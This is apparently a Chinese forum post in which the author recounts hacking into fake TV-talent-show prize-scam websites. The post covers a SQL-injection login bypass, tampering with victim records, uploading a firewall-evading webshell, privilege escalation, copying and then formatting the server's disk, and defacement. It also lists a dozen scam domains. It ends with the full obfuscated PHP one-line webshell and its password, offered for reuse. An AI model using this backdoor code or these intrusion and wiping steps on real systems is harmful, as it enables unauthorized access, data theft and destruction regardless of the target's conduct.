前几天我爸给俺转发了个短信,让领奖。问是真的假的,是《快乐男声》领奖,假的也太明显了,然后俺嘞除恶扬善的精神就迸发了
我看了一下后台填写的信息,里面男女老少都有,都不知道怎么想的
一、祭出神器开扫
扫的过程中顺道刷新了一下网站,有狗,还是新狗,扫描是行不通了,不过刚开始的时候扫到一个后台路径,打开,弱口令无果,加分号报错
这里有个地方不是很明白,我网上搜了很多万能密码,都不能用,但是我又试了一遍,开始的时候’or 1=1– 进不去,后来我又试过一遍,神奇
的进去了。后来再试,就不行了。。谁能解释一下
二、拿shell
发现有跟多人的信息,不知道他们有没有真的打钱,不过这些信息应该是真的,为了不让更多人受骗,改中奖信息和打款金额给丫治脚气
本来我点修改模板的时候,是爆刚开始那个错误的,所以准备就这么着了,但是刷新了一下,就能访问了,是不是人品爆发了
有狗,所以改个过狗的马
权限很松,翻看网站目录,还有几个,都是这类的骗纸站,都是中国好声音的几个:
可能域名不止这几个,因为有几个目录跟域名不对照
ctcnx.com
hdzvt.com 这个是QQ炫舞的,估计是盗号的
hdcnh.com
hdzge.com
zjwxhy.com
hsytvljw.com
hdcta.com
czvxm.com
hsys53.com
hdzgx.com
zghaosyss.com
nsmzu.com 快乐男声的
三、提权,格盘
支持ASPX,传个大马。PR提权不说了,我把他放网站的盘打个包,就格盘了
最后挂个警告
求大牛解释那个万能密码的原因。
这个过狗一句话大家都不知道么?。。不过要用过狗菜刀才能连接
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
密码:-7